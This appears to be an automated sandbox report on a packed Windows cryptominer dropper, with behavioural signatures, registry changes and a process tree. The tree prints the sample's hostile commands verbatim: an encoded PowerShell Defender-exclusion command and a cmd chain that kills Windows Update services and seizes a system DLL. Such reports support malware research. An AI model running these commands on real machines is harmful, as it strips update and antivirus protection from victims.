Analysis
-
max time kernel
300s -
max time network
270s -
platform
windows10-1703_x64 -
resource
win10-20220718-en -
resource tags
arch:x64arch:x86image:win10-20220718-enlocale:en-usos:windows10-1703-x64system -
submitted
05-08-2022 22:15
Behavioral task
behavioral1
Sample
58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
Resource
win7-20220718-en
General
-
Target
58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
-
Size
7.1MB
-
MD5
2144e985a1fb8a18636dee1b1fcf096f
-
SHA1
fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a
-
SHA256
58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895
-
SHA512
48d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes:
updater.exe58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ updater.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe -
XMRig Miner payload 6 IoCs
Processes:
resource yara_rule behavioral2/memory/2868-449-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral2/memory/2868-450-0x000000014036EAC4-mapping.dmp xmrig behavioral2/memory/2868-451-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral2/memory/2868-452-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral2/memory/2868-474-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral2/memory/2868-475-0x0000000140000000-0x0000000140809000-memory.dmp xmrig -
Drops file in Drivers directory 2 IoCs
Processes:
conhost.execonhost.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe -
Executes dropped EXE 1 IoCs
Processes:
updater.exepid process 436 updater.exe -
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exetakeown.exeicacls.exeicacls.exepid process 420 takeown.exe 644 takeown.exe 3228 icacls.exe 2768 icacls.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exeupdater.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion updater.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exeicacls.exeicacls.exetakeown.exepid process 644 takeown.exe 3228 icacls.exe 2768 icacls.exe 420 takeown.exe -
Processes:
resource yara_rule behavioral2/memory/3160-117-0x0000000000400000-0x0000000001066000-memory.dmp themida behavioral2/memory/3160-118-0x0000000000400000-0x0000000001066000-memory.dmp themida behavioral2/memory/3160-123-0x0000000000400000-0x0000000001066000-memory.dmp themida C:\Program Files\Google\Chrome\updater.exe themida C:\Program Files\Google\Chrome\updater.exe themida behavioral2/memory/436-264-0x0000000000400000-0x0000000001066000-memory.dmp themida behavioral2/memory/436-266-0x0000000000400000-0x0000000001066000-memory.dmp themida behavioral2/memory/436-272-0x0000000000400000-0x0000000001066000-memory.dmp themida -
Processes:
58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exeupdater.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA updater.exe -
Drops file in System32 directory 4 IoCs
Processes:
powershell.execonhost.exepowershell.EXEdescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log conhost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exeupdater.exepid process 3160 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe 436 updater.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
conhost.exedescription pid process target process PID 3152 set thread context of 2868 3152 conhost.exe explorer.exe -
Drops file in Program Files directory 3 IoCs
Processes:
powershell.execonhost.exedescription ioc process File created C:\Program Files\Google\Chrome\updater.exe powershell.exe File opened for modification C:\Program Files\Google\Chrome\updater.exe powershell.exe File created C:\Program Files\Google\Libs\WR64.sys conhost.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 2588 sc.exe 744 sc.exe 3416 sc.exe 2588 sc.exe 2768 sc.exe 1340 sc.exe 316 sc.exe 1812 sc.exe 3536 sc.exe 3904 sc.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.EXEconhost.exepowershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe -
Modifies registry key 1 TTPs 18 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 660 reg.exe 3536 reg.exe 3892 reg.exe 3808 reg.exe 4000 reg.exe 2024 reg.exe 1164 reg.exe 2736 reg.exe 3296 reg.exe 1104 reg.exe 1348 reg.exe 1424 reg.exe 372 reg.exe 2608 reg.exe 500 reg.exe 1988 reg.exe 1028 reg.exe 624 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.execonhost.exepowershell.exepowershell.EXEpowershell.execonhost.exeexplorer.exepid process 3448 powershell.exe 3448 powershell.exe 3448 powershell.exe 2868 conhost.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 3172 powershell.EXE 3172 powershell.EXE 3172 powershell.EXE 160 powershell.exe 160 powershell.exe 160 powershell.exe 3152 conhost.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe 2868 explorer.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 628 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowercfg.execonhost.exepowercfg.exepowercfg.exepowercfg.exetakeown.exepowershell.exedescription pid process Token: SeDebugPrivilege 3448 powershell.exe Token: SeIncreaseQuotaPrivilege 3448 powershell.exe Token: SeSecurityPrivilege 3448 powershell.exe Token: SeTakeOwnershipPrivilege 3448 powershell.exe Token: SeLoadDriverPrivilege 3448 powershell.exe Token: SeSystemProfilePrivilege 3448 powershell.exe Token: SeSystemtimePrivilege 3448 powershell.exe Token: SeProfSingleProcessPrivilege 3448 powershell.exe Token: SeIncBasePriorityPrivilege 3448 powershell.exe Token: SeCreatePagefilePrivilege 3448 powershell.exe Token: SeBackupPrivilege 3448 powershell.exe Token: SeRestorePrivilege 3448 powershell.exe Token: SeShutdownPrivilege 3448 powershell.exe Token: SeDebugPrivilege 3448 powershell.exe Token: SeSystemEnvironmentPrivilege 3448 powershell.exe Token: SeRemoteShutdownPrivilege 3448 powershell.exe Token: SeUndockPrivilege 3448 powershell.exe Token: SeManageVolumePrivilege 3448 powershell.exe Token: 33 3448 powershell.exe Token: 34 3448 powershell.exe Token: 35 3448 powershell.exe Token: 36 3448 powershell.exe Token: SeShutdownPrivilege 2284 powercfg.exe Token: SeCreatePagefilePrivilege 2284 powercfg.exe Token: SeDebugPrivilege 2868 conhost.exe Token: SeShutdownPrivilege 1828 powercfg.exe Token: SeCreatePagefilePrivilege 1828 powercfg.exe Token: SeShutdownPrivilege 700 powercfg.exe Token: SeCreatePagefilePrivilege 700 powercfg.exe Token: SeShutdownPrivilege 4000 powercfg.exe Token: SeCreatePagefilePrivilege 4000 powercfg.exe Token: SeTakeOwnershipPrivilege 644 takeown.exe Token: SeDebugPrivilege 3168 powershell.exe Token: SeIncreaseQuotaPrivilege 3168 powershell.exe Token: SeSecurityPrivilege 3168 powershell.exe Token: SeTakeOwnershipPrivilege 3168 powershell.exe Token: SeLoadDriverPrivilege 3168 powershell.exe Token: SeSystemProfilePrivilege 3168 powershell.exe Token: SeSystemtimePrivilege 3168 powershell.exe Token: SeProfSingleProcessPrivilege 3168 powershell.exe Token: SeIncBasePriorityPrivilege 3168 powershell.exe Token: SeCreatePagefilePrivilege 3168 powershell.exe Token: SeBackupPrivilege 3168 powershell.exe Token: SeRestorePrivilege 3168 powershell.exe Token: SeShutdownPrivilege 3168 powershell.exe Token: SeDebugPrivilege 3168 powershell.exe Token: SeSystemEnvironmentPrivilege 3168 powershell.exe Token: SeRemoteShutdownPrivilege 3168 powershell.exe Token: SeUndockPrivilege 3168 powershell.exe Token: SeManageVolumePrivilege 3168 powershell.exe Token: 33 3168 powershell.exe Token: 34 3168 powershell.exe Token: 35 3168 powershell.exe Token: 36 3168 powershell.exe Token: SeIncreaseQuotaPrivilege 3168 powershell.exe Token: SeSecurityPrivilege 3168 powershell.exe Token: SeTakeOwnershipPrivilege 3168 powershell.exe Token: SeLoadDriverPrivilege 3168 powershell.exe Token: SeSystemProfilePrivilege 3168 powershell.exe Token: SeSystemtimePrivilege 3168 powershell.exe Token: SeProfSingleProcessPrivilege 3168 powershell.exe Token: SeIncBasePriorityPrivilege 3168 powershell.exe Token: SeCreatePagefilePrivilege 3168 powershell.exe Token: SeBackupPrivilege 3168 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.execonhost.execmd.execmd.exedescription pid process target process PID 3160 wrote to memory of 2868 3160 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe conhost.exe PID 3160 wrote to memory of 2868 3160 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe conhost.exe PID 3160 wrote to memory of 2868 3160 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe conhost.exe PID 2868 wrote to memory of 3448 2868 conhost.exe powershell.exe PID 2868 wrote to memory of 3448 2868 conhost.exe powershell.exe PID 2868 wrote to memory of 32 2868 conhost.exe cmd.exe PID 2868 wrote to memory of 32 2868 conhost.exe cmd.exe PID 2868 wrote to memory of 2340 2868 conhost.exe cmd.exe PID 2868 wrote to memory of 2340 2868 conhost.exe cmd.exe PID 32 wrote to memory of 2588 32 cmd.exe sc.exe PID 32 wrote to memory of 2588 32 cmd.exe sc.exe PID 2340 wrote to memory of 2284 2340 cmd.exe powercfg.exe PID 2340 wrote to memory of 2284 2340 cmd.exe powercfg.exe PID 2340 wrote to memory of 1828 2340 cmd.exe powercfg.exe PID 2340 wrote to memory of 1828 2340 cmd.exe powercfg.exe PID 32 wrote to memory of 3536 32 cmd.exe sc.exe PID 32 wrote to memory of 3536 32 cmd.exe sc.exe PID 2340 wrote to memory of 700 2340 cmd.exe powercfg.exe PID 2340 wrote to memory of 700 2340 cmd.exe powercfg.exe PID 32 wrote to memory of 3904 32 cmd.exe sc.exe PID 32 wrote to memory of 3904 32 cmd.exe sc.exe PID 2340 wrote to memory of 4000 2340 cmd.exe powercfg.exe PID 2340 wrote to memory of 4000 2340 cmd.exe powercfg.exe PID 32 wrote to memory of 2768 32 cmd.exe sc.exe PID 32 wrote to memory of 2768 32 cmd.exe sc.exe PID 32 wrote to memory of 1340 32 cmd.exe sc.exe PID 32 wrote to memory of 1340 32 cmd.exe sc.exe PID 32 wrote to memory of 2736 32 cmd.exe reg.exe PID 32 wrote to memory of 2736 32 cmd.exe reg.exe PID 32 wrote to memory of 3892 32 cmd.exe reg.exe PID 32 wrote to memory of 3892 32 cmd.exe reg.exe PID 32 wrote to memory of 372 32 cmd.exe reg.exe PID 32 wrote to memory of 372 32 cmd.exe reg.exe PID 32 wrote to memory of 2608 32 cmd.exe reg.exe PID 32 wrote to memory of 2608 32 cmd.exe reg.exe PID 32 wrote to memory of 500 32 cmd.exe reg.exe PID 32 wrote to memory of 500 32 cmd.exe reg.exe PID 32 wrote to memory of 644 32 cmd.exe takeown.exe PID 32 wrote to memory of 644 32 cmd.exe takeown.exe PID 32 wrote to memory of 3228 32 cmd.exe icacls.exe PID 32 wrote to memory of 3228 32 cmd.exe icacls.exe PID 2868 wrote to memory of 3168 2868 conhost.exe powershell.exe PID 2868 wrote to memory of 3168 2868 conhost.exe powershell.exe PID 32 wrote to memory of 3296 32 cmd.exe reg.exe PID 32 wrote to memory of 3296 32 cmd.exe reg.exe PID 32 wrote to memory of 1104 32 cmd.exe reg.exe PID 32 wrote to memory of 1104 32 cmd.exe reg.exe PID 32 wrote to memory of 3808 32 cmd.exe reg.exe PID 32 wrote to memory of 3808 32 cmd.exe reg.exe PID 32 wrote to memory of 1988 32 cmd.exe reg.exe PID 32 wrote to memory of 1988 32 cmd.exe reg.exe PID 32 wrote to memory of 212 32 cmd.exe schtasks.exe PID 32 wrote to memory of 212 32 cmd.exe schtasks.exe PID 32 wrote to memory of 2168 32 cmd.exe schtasks.exe PID 32 wrote to memory of 2168 32 cmd.exe schtasks.exe PID 32 wrote to memory of 3104 32 cmd.exe schtasks.exe PID 32 wrote to memory of 3104 32 cmd.exe schtasks.exe PID 32 wrote to memory of 2176 32 cmd.exe schtasks.exe PID 32 wrote to memory of 2176 32 cmd.exe schtasks.exe PID 32 wrote to memory of 1132 32 cmd.exe schtasks.exe PID 32 wrote to memory of 1132 32 cmd.exe schtasks.exe PID 32 wrote to memory of 3916 32 cmd.exe schtasks.exe PID 32 wrote to memory of 3916 32 cmd.exe schtasks.exe PID 32 wrote to memory of 4000 32 cmd.exe schtasks.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe"C:\Users\Admin\AppData\Local\Temp\58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe"2⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAZABqAHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAeQAjAD4A"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
